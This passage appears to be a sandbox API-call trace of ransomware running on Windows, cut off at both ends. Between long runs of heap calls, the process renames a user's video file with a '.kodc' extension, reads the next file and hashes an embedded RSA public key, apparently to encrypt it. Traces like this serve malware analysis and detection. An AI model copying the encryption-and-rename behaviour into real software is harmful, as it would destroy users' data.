returned 0x32cec10 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.048] GetCurrentThreadId () returned 0x42c [0100.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6428 [0100.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.048] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.049] GetCurrentThreadId () returned 0x42c [0100.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.050] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.051] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.051] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ba8 [0100.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b78 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b78 | out: hHeap=0x630000) returned 1 [0100.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.055] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ba8 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b90 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b60 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c2b0 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.056] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.057] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x3aeb, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x3aeb, lpOverlapped=0x0) returned 1 [0100.057] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0100.058] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3af0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.058] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.058] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.058] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.058] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.059] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.059] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.059] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.059] CloseHandle (hObject=0x5cc) returned 1 [0100.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0100.060] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.060] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0100.060] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F-YVCgA.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\f-yvcga.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\F-YVCgA.swf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\f-yvcga.swf.kodc")) returned 1 [0100.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.061] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.061] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.062] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11fcec0, ftCreationTime.dwHighDateTime=0x1d5c405, ftLastAccessTime.dwLowDateTime=0xcf592260, ftLastAccessTime.dwHighDateTime=0x1d5bd56, ftLastWriteTime.dwLowDateTime=0xcf592260, ftLastWriteTime.dwHighDateTime=0x1d5bd56, nFileSizeHigh=0x0, nFileSizeLow=0x99da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FSlps3zeN2JQFky.mp4", cAlternateFileName="FSLPS3~1.MP4")) returned 1 [0100.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.062] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.062] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FSlps3zeN2JQFky.mp4") returned=".mp4" [0100.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FSlps3zeN2JQFky.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fslps3zen2jqfky.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.063] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=39386) returned 1 [0100.063] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.066] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x99b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.066] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.067] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.067] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x99da, lpOverlapped=0x0) returned 1 [0100.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.068] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.069] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.069] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.069] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.069] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.069] GetLastError () returned 0x0 [0100.069] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.069] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.069] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.069] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.069] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x99e0) returned 0x9ba6d90 [0100.070] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.070] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c2b0 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c2f8 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b60 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b90 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ba8 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.070] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.071] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.071] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.071] HeapFree (in: 